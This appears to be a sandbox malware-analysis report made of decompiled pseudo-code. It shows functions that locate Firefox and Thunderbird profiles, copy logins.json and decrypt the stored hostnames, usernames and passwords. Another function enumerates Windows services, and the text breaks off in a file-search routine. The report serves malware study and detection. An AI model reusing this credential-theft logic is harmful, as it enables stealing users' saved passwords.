                                      				if(E0043ADBE(L"firefox.exe",  &_v704, _t397) != 0) { // resolve the Firefox install directory
                                      					_t293 =  &_v44;
                                      					E00433412(_t293,  &_v704);
                                      					lstrcatW( &_v704, L"\\firefox.exe");
                                      					GetBinaryTypeW( &_v704,  &_v92);
                                      					_t399 = _v92 - 6; // 6 == SCS_64BIT_BINARY
                                      					_t165 =  &_v44;
                                      					if(_v92 != 6) {
                                      						_push(0); // 32-bit Firefox
                                      					} else {
                                      						_push(1); // 64-bit Firefox
                                      					}
                                      					_push(_t293);
                                      					E0043345A(_t396, _t165);
                                      					_t167 = E0043A6A6(_t392, _t385, _t399);
                                      					_t400 = _t167;
                                      					if(_t167 != 0) {
                                      						E00433297( &_a4, _t385, _t400, L"\\Mozilla\\Firefox\\"); // _a4 = <appdata>\Mozilla\Firefox\
                                      						E0043345A( &_v36,  &_a4);
                                      						E00433297( &_v36, _t385, _t400, L"profiles.ini"); // _v36 = ...\profiles.ini
                                      						E00433264( &_v24, E00433412( &_v40, L"Profile"));
                                      						E00435A2D(_v40);
                                      						E0043309F( &_v24, _t385, _t400, _t281); // _v24 = "Profile0"
                                      						// Iterate "Profile0", "Profile1", ... until no Path key is found.
                                      						while(GetPrivateProfileStringW(_v24, L"Path", _t281,  &_v1224, 0x104, _v36) != 0) {
                                      							_t389 = _t389 + 1;
                                      							_v40 = _t389;
                                      							E00433264( &_v24, E00433412( &_v96, L"Profile"));
                                      							E00435A2D(_v96);
                                      							_v96 = _t281;
                                      							E0043309F( &_v24, _t385, __eflags, _t389); // next section name
                                      							E0043345A( &_v12,  &_a4);
                                      							E00433297( &_v12, _t385, __eflags,  &_v1224); // _v12 = profile directory
                                      							E00433381( &_v12,  &_v28);
                                      							_t189 =  *((intOrPtr*)(_t392 + 0x68))(_v28); // indirect call with the profile path
                                      							__eflags = _t189;
                                      							if(_t189 == 0) {
                                      								_t190 =  *((intOrPtr*)(_t392 + 0x80))();
                                      								_v156 = _t190;
                                      								__eflags = _t190;
                                      								if(_t190 == 0) {
                                      									goto L7;
                                      								} else {
                                      									_t193 =  *((intOrPtr*)(_t392 + 0x7c))(_t190, 1, _t281);
                                      									_t396 = _t396 + 0xc;
                                      									__eflags = _t193;
                                      									if(_t193 != 0) {
                                      										goto L7;
                                      									} else {
                                      										E0043345A( &_v20,  &_v12);
                                      										E00433297( &_v20, _t385, __eflags, L"\\logins.json"); // _v20 = <profile>\logins.json
                                      										_t386 = 0x1a;
                                      										E0043D75B( &_v16, _t386, __eflags); // _v16 = base directory for the temp copy
                                      										E00433297( &_v16, _t386, __eflags, "\\");
                                      										_t385 = 8;
                                      										E00433162( &_v16, __eflags, E004332D4( &_v56, _t385, __eflags)); // 8-character random name
                                      										E00435A2D(_v56);
                                      										_v56 = _t281;
                                      										E00433297( &_v16, _t385, __eflags, L".tmp");
                                      										_t393 = _v16;
                                      										_t390 = _v20;
                                      										__eflags = CopyFileW(_v20, _t393, _t281); // copy logins.json to <random>.tmp
                                      										if(__eflags != 0) {
                                      											E00433264( &_v20,  &_v16);
                                      											_t390 = _v20;
                                      										}
                                      										E0043DE6C( &_v184, __eflags);
                                      										_t325 =  &_v180;
                                      										E00433264(_t325,  &_v20);
                                      										_push(_t325);
                                      										_t207 = E0043E130( &_v184, 0xc0000000);
                                      										_t327 =  &_v184;
                                      										__eflags = _t207;
                                      										if(__eflags != 0) {
                                      											_v52 = _t281;
                                      											_v48 = _t281;
                                      											E0043DDDB( &_v184, _t385,  &_v52, _v164, _t281);
                                      											_t215 = E004331EC( &_v116, "encryptedUsername");
                                      											_t217 = E00432D59( &_v52,  &_v160);
                                      											_t385 = _t215;
                                      											_t283 = E00438B5D(_t217, _t215, __eflags);
                                      											_v120 = _t283;
                                      											E00435A2D(_v160);
                                      											_t336 = _v116;
                                      											E00435A2D(_v116);
                                      											__eflags = _t283;
                                      											if(_t283 == 0) {
                                      												_t281 = 0;
                                      												__eflags = 0;
                                      											} else {
                                      												_t391 = _v32;
                                      												_t281 = 0;
                                      												__eflags = 0;
                                      												_t394 = _v120;
                                      												do {
                                      													_v112 = 0;
                                      													_v108 = 0;
                                      													_v104 = 0;
                                      													_t230 = E004331EC( &_v128, "hostname");
                                      													E00438B96( &_v88, E00432D59( &_v52,  &_v124), __eflags, _t230, _t394);
                                      													E00435A2D(_v124);
                                      													E00435A2D(_v128);
                                      													_t236 = E004331EC( &_v136, "encryptedUsername");
                                      													E00438B96( &_v84, E00432D59( &_v52,  &_v132), __eflags, _t236, _t394);
                                      													E00435A2D(_v132);
                                      													E00435A2D(_v136);
                                      													_t242 = E004331EC( &_v144, "encryptedPassword");
                                      													_t385 = E00432D59( &_v52,  &_v140);
                                      													E00438B96( &_v80, _t244, __eflags, _t242, _t394);
                                      													E00435A2D(_v140);
                                      													E00435A2D(_v144);
                                      													E00439E04(_t391, __eflags, _v84,  &_v72);
                                      													E00439E04(_t391, __eflags, _v80,  &_v76);
                                      													E00433264( &_v112, E00432ECA( &_v88, __eflags,  &_v60));
                                      													E00435A2D(_v60);
                                      													_v60 = 0;
                                      													E00433264( &_v108, E00432ECA(E004331EC( &_v148, _v72), __eflags,  &_v64));
                                      													E00435A2D(_v64);
                                      													_v64 = 0;
                                      													E00435A2D(_v148);
                                      													E00433264( &_v104, E00432ECA(E004331EC( &_v152, _v76), __eflags,  &_v68));
                                      													E00435A2D(_v68);
                                      													_v68 = 0;
                                      													E00435A2D(_v152);
                                      													_t396 = _t396 - 0x10;
                                      													_v100 = 0;
                                      													E00431EB9(_t396,  &_v112);
                                      													E00431EEF(_t391);
                                      													E00435A2D(_v72);
                                      													E00435A2D(_v76);
                                      													E00435A2D(_v80);
                                      													E00435A2D(_v84);
                                      													E00435A2D(_v88);
                                      													_t336 =  &_v112;
                                      													E0043138F( &_v112);
                                      													_t394 = _t394 - 1;
                                      													__eflags = _t394;
                                      												} while (_t394 != 0);
                                      												_t393 = _v16;
                                      												_t390 = _v20;
                                      											}
                                      											_t221 = PathFileExistsW(_t393);
                                      											__eflags = _t221;
                                      											if(_t221 != 0) {
                                      												E0043345A(_t396,  &_v16);
                                      												E0043DEA9(_t336);
                                      											}
                                      											 *((intOrPtr*)(_v32 + 0x84))(_v156);
                                      											 *((intOrPtr*)(_v32 + 0x6c))();
                                      											E00432E66( &_v52);
                                      											_t327 =  &_v184;
                                      										}
                                      										E0043DE8B(_t327, __eflags);
                                      										E00435A2D(_t393);
                                      										_v16 = _t281;
                                      										E00435A2D(_t390);
                                      										_v20 = _t281;
                                      										E00435A2D(_v28);
                                      										E00435A2D(_v12);
                                      										_t389 = _v40;
                                      										_t392 = _v32;
                                      									}
                                      								}
                                      							} else {
                                      								L7:
                                      								E00435A2D(_v28);
                                      								E00435A2D(_v12);
                                      							}
                                      							_v12 = _t281;
                                      						}
                                      						E0043A64F(_t392);
                                      						_t281 = 1;
                                      						E00435A2D(_v36);
                                      					}
                                      					E00435A2D(_v44);
                                      				}
                                      				E00435A2D(_v24);
                                      				E00435A2D(_a4);
                                      				return _t281;
                                      			}
                                      Instruction addresses (per-line address column of the listing above, layout lost in extraction): 0x004398b0 through 0x00439e01

                                      APIs
                                        • Part of subcall function 00433412: lstrlenW.KERNEL32(0043FC61,00000000,?,0043FC61,00000000,?,00000000), ref: 0043341B
                                        • Part of subcall function 00433412: lstrlenW.KERNEL32(0043FC61,?,0043FC61,00000000,?,00000000), ref: 00433432
                                        • Part of subcall function 00433412: lstrcpyW.KERNEL32(?,0043FC61), ref: 0043344D
                                        • Part of subcall function 0043ADBE: lstrcpyW.KERNEL32(?,Software\Microsoft\Windows\CurrentVersion\App Paths\), ref: 0043ADFA
                                        • Part of subcall function 0043ADBE: lstrcatW.KERNEL32(?,thunderbird.exe), ref: 0043AE08
                                        • Part of subcall function 0043ADBE: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,004393CF,?,00000104,00000000), ref: 0043AE21
                                        • Part of subcall function 0043ADBE: RegQueryValueExW.ADVAPI32(004393CF,Path,00000000,?,?,?,?,00000104,00000000), ref: 0043AE3E
                                        • Part of subcall function 0043ADBE: RegCloseKey.ADVAPI32(004393CF,?,00000104,00000000), ref: 0043AE47
                                      • lstrcatW.KERNEL32(?,\firefox.exe), ref: 00439932
                                      • GetBinaryTypeW.KERNEL32(?,?), ref: 00439943
                                      • GetPrivateProfileStringW.KERNEL32(?,Path,00000000,?,00000104,?), ref: 00439DC3
                                        • Part of subcall function 00433264: lstrcpyW.KERNEL32(00000000,00000000), ref: 00433289
                                        • Part of subcall function 00435A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0043E2AE,?,?,?,?,?,00000000), ref: 00435A35
                                        • Part of subcall function 0043309F: wsprintfW.USER32 ref: 004330BA
                                        • Part of subcall function 0043345A: lstrcpyW.KERNEL32(00000000,?), ref: 00433484
                                        • Part of subcall function 00433381: WideCharToMultiByte.KERNEL32(00000000,00000200,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00434AC0,?), ref: 004333AE
                                        • Part of subcall function 00433381: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00434AC0,?,?,?,?,?), ref: 004333D9
                                      • CopyFileW.KERNEL32(?,?,00000000), ref: 00439ABA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$ByteCharMultiWidelstrcatlstrlen$BinaryCloseCopyFileFreeOpenPrivateProfileQueryStringTypeValueVirtualwsprintf
                                      • String ID: .tmp$Path$Profile$\Mozilla\Firefox\$\firefox.exe$\logins.json$encryptedPassword$encryptedUsername$firefox.exe$hostname$profiles.ini
                                      • API String ID: 288196626-815594582
                                      • Opcode ID: 4580d06380d9f67f08ecf01215769d3a714d46447b39f138304f49e8646984f5
                                      • Instruction ID: 366668c8ac2844ee9c71a89ef6ec8087ecec9a416ba350765075c5a28c357167
                                      • Opcode Fuzzy Hash: 4580d06380d9f67f08ecf01215769d3a714d46447b39f138304f49e8646984f5
                                      • Instruction Fuzzy Hash: 3EE13B71A001189BDB04FFA2DD929EEB779AF08308F10616FF11667192EF786E45CB58
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      C-Code - Quality: 94%
                                      			E0043936E(intOrPtr __ecx, void* __eflags, char _a4) {
                                      				int _v12;
                                      				int _v16;
                                      				WCHAR* _v20;
                                      				WCHAR* _v24;
                                      				char _v28;
                                      				intOrPtr _v32;
                                      				char _v36;
                                      				char _v40;
                                      				char _v44;
                                      				int _v48;
                                      				int _v52;
                                      				long _v56;
                                      				int _v60;
                                      				int _v64;
                                      				char _v68;
                                      				char _v72;
                                      				char _v76;
                                      				char _v80;
                                      				char _v84;
                                      				intOrPtr _v88;
                                      				char _v92;
                                      				char _v96;
                                      				char _v100;
                                      				void* _v104;
                                      				int _v108;
                                      				char _v112;
                                      				char _v116;
                                      				char _v120;
                                      				char _v124;
                                      				char _v128;
                                      				char _v132;
                                      				char _v136;
                                      				char _v140;
                                      				char _v144;
                                      				char _v148;
                                      				int _v152;
                                      				long _v156;
                                      				char _v160;
                                      				intOrPtr _v164;
                                      				char _v180;
                                      				char _v184;
                                      				short _v704;
                                      				short _v1224;
                                      				long _t171;
                                      				int _t182;
                                      				int _t183;
                                      				int _t186;
                                      				int _t200;
                                      				WCHAR* _t208;
                                      				void* _t210;
                                      				int _t214;
                                      				void* _t223;
                                      				void* _t229;
                                      				void* _t235;
                                      				int _t279;
                                      				int _t281;
                                      				char* _t321;
                                      				void* _t382;
                                      				intOrPtr _t385;
                                      				intOrPtr _t387;
                                      				WCHAR* _t392;
                                      				int _t393;
                                      				void* _t394;
                                      				void* _t395;
                                      				void* _t396;
                                      
                                      				_t396 = __eflags;
                                      				_t385 = __ecx;
                                      				_v32 = __ecx;
                                      				E00433412( &_v24, L"Profile");
                                      				_t279 = 0;
                                      				E00431052( &_v1224, 0, 0x208);
                                      				_v56 = 0;
                                      				_v156 = 0;
                                      				E00431052( &_v704, 0, 0x104);
                                      				_t395 = _t394 + 0x14;
                                      				_t381 =  &_v704;
                                      				E0043ADBE(L"thunderbird.exe",  &_v704, _t396);
                                      				E00433412( &_v44,  &_v704);
                                      				GetBinaryTypeW( &_v704,  &_v156);
                                      				E0043345A(_t395,  &_v44);
                                      				_t289 = _t385;
                                      				if(E0043A324(_t385,  &_v704,  &_v44) != 0) {
                                      					L3:
                                      					E00433297( &_a4, _t381, __eflags, L"\\Thunderbird\\");
                                      					E0043345A( &_v36,  &_a4);
                                      					E00433297( &_v36, _t381, __eflags, L"profiles.ini");
                                      					E00433264( &_v24, E00433412( &_v40, L"Profile"));
                                      					E00435A2D(_v40);
                                      					E0043309F( &_v24, _t381, __eflags, _t279);
                                      					_push(_v36);
                                      					_push(0x104);
                                      					while(1) {
                                      						_t389 = _v24;
                                      						_t171 = GetPrivateProfileStringW(_v24, L"Path", _t279,  &_v1224, ??, ??);
                                      						__eflags = _t171;
                                      						if(_t171 == 0) {
                                      							break;
                                      						}
                                      						_v56 = _v56 + 1;
                                      						E00433264( &_v24, E00433412( &_v60, L"Profile"));
                                      						E00435A2D(_v60);
                                      						_v60 = _t279;
                                      						E0043309F( &_v24, _t381, __eflags, _v56 + 1);
                                      						E0043345A( &_v12,  &_a4);
                                      						E00433297( &_v12, _t381, __eflags,  &_v1224);
                                      						E00433381( &_v12,  &_v28);
                                      						_t182 =  *((intOrPtr*)(_t385 + 0x68))(_v28);
                                      						__eflags = _t182;
                                      						if(_t182 == 0) {
                                      							_t183 =  *((intOrPtr*)(_t385 + 0x80))();
                                      							_v152 = _t183;
                                      							__eflags = _t183;
                                      							if(_t183 == 0) {
                                      								goto L5;
                                      							} else {
                                      								_t186 =  *((intOrPtr*)(_t385 + 0x7c))(_t183, 1, _t279);
                                      								_t395 = _t395 + 0xc;
                                      								__eflags = _t186;
                                      								if(_t186 != 0) {
                                      									goto L5;
                                      								} else {
                                      									E0043345A( &_v20,  &_v12);
                                      									E00433297( &_v20, _t381, __eflags, L"\\logins.json");
                                      									_t382 = 0x1a;
                                      									E0043D75B( &_v16, _t382, __eflags);
                                      									E00433297( &_v16, _t382, __eflags, "\\");
                                      									_t381 = 8;
                                      									E00433162( &_v16, __eflags, E004332D4( &_v64, _t381, __eflags));
                                      									E00435A2D(_v64);
                                      									_v64 = _t279;
                                      									E00433297( &_v16, _t381, __eflags, L".tmp");
                                      									_t392 = _v16;
                                      									_t386 = _v20;
                                      									__eflags = CopyFileW(_v20, _t392, _t279);
                                      									if(__eflags != 0) {
                                      										E00433264( &_v20,  &_v16);
                                      										_t386 = _v20;
                                      									}
                                      									E0043DE6C( &_v184, __eflags);
                                      									_t321 =  &_v180;
                                      									E00433264(_t321,  &_v20);
                                      									_push(_t321);
                                      									_t200 = E0043E130( &_v184, 0xc0000000);
                                      									_t323 =  &_v184;
                                      									__eflags = _t200;
                                      									if(__eflags != 0) {
                                      										_v52 = _t279;
                                      										_v48 = _t279;
                                      										E0043DDDB( &_v184, _t381,  &_v52, _v164, _t279);
                                      										_t208 = E004331EC( &_v104, "encryptedUsername");
                                      										_t210 = E00432D59( &_v52,  &_v160);
                                      										_t381 = _t208;
                                      										_t281 = E00438B5D(_t210, _t208, __eflags);
                                      										_v108 = _t281;
                                      										E00435A2D(_v160);
                                      										_t332 = _v104;
                                      										E00435A2D(_v104);
                                      										__eflags = _t281;
                                      										if(_t281 == 0) {
                                      											_t279 = 0;
                                      											__eflags = 0;
                                      										} else {
                                      											_t387 = _v32;
                                      											_t279 = 0;
                                      											__eflags = 0;
                                      											_t393 = _v108;
                                      											do {
                                      												_v100 = 0;
                                      												_v96 = 0;
                                      												_v92 = 0;
                                      												_t223 = E004331EC( &_v116, "hostname");
                                      												E00438B96( &_v40, E00432D59( &_v52,  &_v112), __eflags, _t223, _t393);
                                      												E00435A2D(_v112);
                                      												E00435A2D(_v116);
                                      												_t229 = E004331EC( &_v124, "encryptedUsername");
                                      												E00438B96( &_v84, E00432D59( &_v52,  &_v120), __eflags, _t229, _t393);
                                      												E00435A2D(_v120);
                                      												E00435A2D(_v124);
                                      												_t235 = E004331EC( &_v132, "encryptedPassword");
                                      												_t381 = E00432D59( &_v52,  &_v128);
                                      												E00438B96( &_v80, _t237, __eflags, _t235, _t393);
                                      												E00435A2D(_v128);
                                      												E00435A2D(_v132);
                                      												E00439E04(_t387, __eflags, _v84,  &_v136);
                                      												E00439E04(_t387, __eflags, _v80,  &_v144);
                                      												E00433264( &_v100, E00432ECA( &_v40, __eflags,  &_v68));
                                      												E00435A2D(_v68);
                                      												_v68 = 0;
                                      												E00433264( &_v96, E00432ECA(E004331EC( &_v140, _v136), __eflags,  &_v72));
                                      												E00435A2D(_v72);
                                      												_v72 = 0;
                                      												E00435A2D(_v140);
                                      												E00433264( &_v92, E00432ECA(E004331EC( &_v148, _v144), __eflags,  &_v76));
                                      												E00435A2D(_v76);
                                      												_v76 = 0;
                                      												E00435A2D(_v148);
                                      												_t395 = _t395 - 0x10;
                                      												_v88 = 4;
                                      												E00431EB9(_t395,  &_v100);
                                      												E00431EEF(_t387);
                                      												E00435A2D(_v80);
                                      												E00435A2D(_v84);
                                      												E00435A2D(_v40);
                                      												_t332 =  &_v100;
                                      												E0043138F( &_v100);
                                      												_t393 = _t393 - 1;
                                      												__eflags = _t393;
                                      											} while (_t393 != 0);
                                      											_t392 = _v16;
                                      											_t386 = _v20;
                                      										}
                                      										_t214 = PathFileExistsW(_t392);
                                      										__eflags = _t214;
                                      										if(_t214 != 0) {
                                      											E0043345A(_t395,  &_v16);
                                      											E0043DEA9(_t332);
                                      										}
                                      										 *((intOrPtr*)(_v32 + 0x84))(_v152);
                                      										 *((intOrPtr*)(_v32 + 0x6c))();
                                      										E00432E66( &_v52);
                                      										_t323 =  &_v184;
                                      									}
                                      									E0043DE8B(_t323, __eflags);
                                      									E00435A2D(_t392);
                                      									_v16 = _t279;
                                      									E00435A2D(_t386);
                                      									_v20 = _t279;
                                      									E00435A2D(_v28);
                                      									E00435A2D(_v12);
                                      									_t385 = _v32;
                                      								}
                                      							}
                                      						} else {
                                      							L5:
                                      							E00435A2D(_v28);
                                      							E00435A2D(_v12);
                                      						}
                                      						_push(_v36);
                                      						_v12 = _t279;
                                      						_push(0x104);
                                      					}
                                      					E0043A2CD(_t385);
                                      					_t279 = 1;
                                      					__eflags = 1;
                                      					E00435A2D(_v36);
                                      				} else {
                                      					E0043345A(_t395,  &_v44);
                                      					if(E0043A324(_t385,  &_v704, _t289) != 0) {
                                      						goto L3;
                                      					} else {
                                      						_t389 = _v24;
                                      					}
                                      				}
                                      				E00435A2D(_v44);
                                      				E00435A2D(_t389);
                                      				E00435A2D(_a4);
                                      				return _t279;
                                      			}

                                      APIs
                                        • Part of subcall function 00433412: lstrlenW.KERNEL32(0043FC61,00000000,?,0043FC61,00000000,?,00000000), ref: 0043341B
                                        • Part of subcall function 00433412: lstrlenW.KERNEL32(0043FC61,?,0043FC61,00000000,?,00000000), ref: 00433432
                                        • Part of subcall function 00433412: lstrcpyW.KERNEL32(?,0043FC61), ref: 0043344D
                                        • Part of subcall function 0043ADBE: lstrcpyW.KERNEL32(?,Software\Microsoft\Windows\CurrentVersion\App Paths\), ref: 0043ADFA
                                        • Part of subcall function 0043ADBE: lstrcatW.KERNEL32(?,thunderbird.exe), ref: 0043AE08
                                        • Part of subcall function 0043ADBE: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,004393CF,?,00000104,00000000), ref: 0043AE21
                                        • Part of subcall function 0043ADBE: RegQueryValueExW.ADVAPI32(004393CF,Path,00000000,?,?,?,?,00000104,00000000), ref: 0043AE3E
                                        • Part of subcall function 0043ADBE: RegCloseKey.ADVAPI32(004393CF,?,00000104,00000000), ref: 0043AE47
                                      • GetBinaryTypeW.KERNEL32(?,?), ref: 004393ED
                                        • Part of subcall function 0043345A: lstrcpyW.KERNEL32(00000000,?), ref: 00433484
                                        • Part of subcall function 0043A324: GetCurrentDirectoryW.KERNEL32(00000104,?,?,00000104,00000000), ref: 0043A352
                                        • Part of subcall function 0043A324: SetCurrentDirectoryW.KERNEL32(?,?,00000104,00000000), ref: 0043A35B
                                        • Part of subcall function 0043A324: PathFileExistsW.SHLWAPI(00439406), ref: 0043A449
                                      • GetPrivateProfileStringW.KERNEL32(?,Path,00000000,?,00000104,?), ref: 00439870
                                        • Part of subcall function 0043A324: PathFileExistsW.SHLWAPI(00439406), ref: 0043A4A5
                                        • Part of subcall function 0043A324: LoadLibraryW.KERNEL32(?), ref: 0043A4E4
                                        • Part of subcall function 0043A324: LoadLibraryW.KERNEL32(?), ref: 0043A4EF
                                        • Part of subcall function 0043A324: LoadLibraryW.KERNEL32(?), ref: 0043A4FA
                                        • Part of subcall function 0043A324: LoadLibraryW.KERNEL32(?), ref: 0043A505
                                        • Part of subcall function 0043A324: LoadLibraryW.KERNEL32(?), ref: 0043A510
                                        • Part of subcall function 0043A324: SetCurrentDirectoryW.KERNEL32(?,?,00000104,00000000), ref: 0043A5FD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
• Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
• Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
• Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
• Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LibraryLoad$CurrentDirectorylstrcpy$ExistsFilePathlstrlen$BinaryCloseOpenPrivateProfileQueryStringTypeValuelstrcat
                                      • String ID: .tmp$Path$Profile$\Thunderbird\$\logins.json$encryptedPassword$encryptedUsername$hostname$profiles.ini$thunderbird.exe
                                      • API String ID: 1065485167-1863067114
                                      • Opcode ID: 1a0d726d7e52a909ed275847f9cfe30c0bccc9dfa2d220fe99b2b9e34059ce28
                                      • Instruction ID: 53aab778e9848f1c944c78fa4c41d079174917c5f190c629eaef6234bc45c7b2
                                      • Opcode Fuzzy Hash: 1a0d726d7e52a909ed275847f9cfe30c0bccc9dfa2d220fe99b2b9e34059ce28
                                      • Instruction Fuzzy Hash: 8CE12971A001189BDB04FFA2DD929EEB779AF18308F10606FF11667192EF786E45CB58
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      C-Code - Quality: 89%
                                      			E0043BDDC(intOrPtr __ecx) {
                                      				char _v8;
                                      				signed int _v12;
                                      				char _v16;
                                      				char _v20;
                                      				short* _v24;
                                      				signed int _v28;
                                      				short** _v32;
                                      				short* _v36;
                                      				signed int _v40;
                                      				intOrPtr _v44;
                                      				intOrPtr* _t66;
                                      				char* _t69;
                                      				void* _t90;
                                      				intOrPtr* _t91;
                                      				intOrPtr _t92;
                                      				intOrPtr _t105;
                                      				intOrPtr* _t112;
                                      				intOrPtr _t113;
                                      				char _t114;
                                      				signed int _t115;
                                      				signed int _t116;
                                      				void* _t117;
                                      				void* _t119;
                                      
                                      				_t113 = __ecx;
                                      				_v44 = __ecx;
                                      				_v20 = 0;
                                      				_v16 = 0;
                                      				_v8 = 0;
                                      				_v24 = 0;
                                      				_v36 = 0;
                                      				_t90 = OpenSCManagerW(0, L"ServicesActive", 5);
                                      				if(_t90 == 0) {
                                      					L9:
                                      					_v40 = _v40 & 0x00000000;
                                      					L10:
                                      					E00435A2D(_v24);
                                      					return _v40;
                                      				}
                                      				_v40 = 1;
                                      				_v32 = _t113 + 0x28;
                                      				while(1) {
                                      					L2:
                                      					_v16 = 0;
                                      					__imp__EnumServicesStatusExW(_t90, 0, 0x30, 3, 0, 0,  &_v20,  &_v8,  &_v16, 0);
                                      					_t114 = _v20;
                                      					_t66 = E00435A87(_t114);
                                      					_t112 = _t66;
                                      					_t69 =  &_v20;
                                      					__imp__EnumServicesStatusExW(_t90, 0, 0x30, 3, _t112, _t114, _t69,  &_v8,  &_v16, 0);
                                      					if(_t69 == 0 && GetLastError() != 0xea) {
                                      						goto L9;
                                      					}
                                      					CloseServiceHandle(_t90);
                                      					_t115 = 0;
                                      					if(_v8 <= 0) {
                                      						goto L9;
                                      					}
                                      					_t91 = _t112;
                                      					while( *_t91 != 0) {
                                      						E00433412( &_v12,  *_t91);
                                      						if(E00433075( &_v12, _v32) != 0) {
                                      							_t116 = _t115 * 0x2c;
                                      							E00433264( &_v24, E00433412( &_v28,  *((intOrPtr*)(_t116 + _t112))));
                                      							E00435A2D(_v28);
                                      							_t92 = _v44;
                                      							_v28 = _v28 & 0x00000000;
                                      							 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t116 + _t112 + 0x24));
                                      							E00435A2D(_v12);
                                      							_v12 = _v12 & 0x00000000;
                                      							if( *((intOrPtr*)(_t92 + 0x2c)) != 0) {
                                      								_t105 = _v8;
                                      								_t117 = 0;
                                      								if(_t105 == 0) {
                                      									goto L10;
                                      								}
                                      								while( *_t112 != 0) {
                                      									if( *((intOrPtr*)(_t112 + 0x24)) !=  *((intOrPtr*)(_t92 + 0x2c))) {
                                      										L21:
                                      										_t117 = _t117 + 1;
                                      										_t112 = _t112 + 0x2c;
                                      										if(_t117 < _t105) {
                                      											continue;
                                      										}
                                      										goto L10;
                                      									}
                                      									E00433412( &_v12,  *_t112);
                                      									if(lstrcmpW(_v12, _v24) != 0) {
                                      										E00433412(_t119,  *_t112);
                                      										E004320E1(_t92 + 0x40,  &_v12);
                                      									}
                                      									E00435A2D(_v12);
                                      									_v12 = _v12 & 0x00000000;
                                      									_t105 = _v8;
                                      									goto L21;
                                      								}
                                      								goto L10;
                                      							}
                                      							if(_v36 == 1) {
                                      								goto L9;
                                      							}
                                      							E0043B81D(_v32, 2);
                                      							E0043B889(_v32);
                                      							_v36 = 1;
                                      							E004310C1(_t112);
                                      							_t90 = OpenSCManagerW(0, L"ServicesActive", 5);
                                      							if(_t90 != 0) {
                                      								goto L2;
                                      							}
                                      							goto L9;
                                      						}
                                      						E00435A2D(_v12);
                                      						_v12 = _v12 & 0x00000000;
                                      						_t91 = _t91 + 0x2c;
                                      						_t115 = _t115 + 1;
                                      						if(_t115 < _v8) {
                                      							continue;
                                      						}
                                      						goto L9;
                                      					}
                                      					goto L9;
                                      				}
                                      				goto L9;
                                      			}

                                      APIs
                                      • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000005), ref: 0043BE03
                                      • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,00000000,00000000,?,?,?,00000000), ref: 0043BE3A
                                        • Part of subcall function 00435A87: GetProcessHeap.KERNEL32(00000000,?,00432DD7,?,?,?,0043E39B,?,004358E9,?,?,00000000,?,004355D2,00000000), ref: 00435A8A
                                        • Part of subcall function 00435A87: RtlAllocateHeap.NTDLL(00000000,?,0043E39B,?,004358E9,?,?,00000000,?,004355D2,00000000,?,?,00000000), ref: 00435A91
                                      • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,00000000,?,?,?,?,00000000), ref: 0043BE63
                                      • GetLastError.KERNEL32 ref: 0043BE6D
                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 0043BE7B
                                      • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000005,00000000,00000000,00000000), ref: 0043BF3C
                                      • lstrcmpW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 0043BF7F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: EnumHeapManagerOpenServicesStatus$AllocateCloseErrorHandleLastProcessServicelstrcmp
                                      • String ID: ServicesActive
                                      • API String ID: 899334174-3071072050
                                      • Opcode ID: 2f8e4e9c7b3a6555f6513c99d94bc95428cd8d011cddfa7f5c4d55b36226a90b
                                      • Instruction ID: 8a15f3387315b206559d1dbc8046d0a9313a9e2dc193ac57cd7ff6e9fc5dcace
                                      • Opcode Fuzzy Hash: 2f8e4e9c7b3a6555f6513c99d94bc95428cd8d011cddfa7f5c4d55b36226a90b
                                      • Instruction Fuzzy Hash: 18516071A00219ABDB15EF95CD96BEEB7B8EF0C305F10516AE601B6281DB785E40CF98
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      C-Code - Quality: 100%
                                      			E00438A9C(intOrPtr __ecx) {
                                      				char _v272;
                                      				struct _WIN32_FIND_DATAA _v592;
                                      				char _v856;
                                      				char _v1120;
                                      				intOrPtr _t31;
                                      				void* _t36;
                                      
                                      				_t31 = __ecx;
                                      				GetFullPathNameA(0x446698, 0x104,  &_v856, 0);
                                      				PathCombineA( &_v1120,  &_v856, "*");
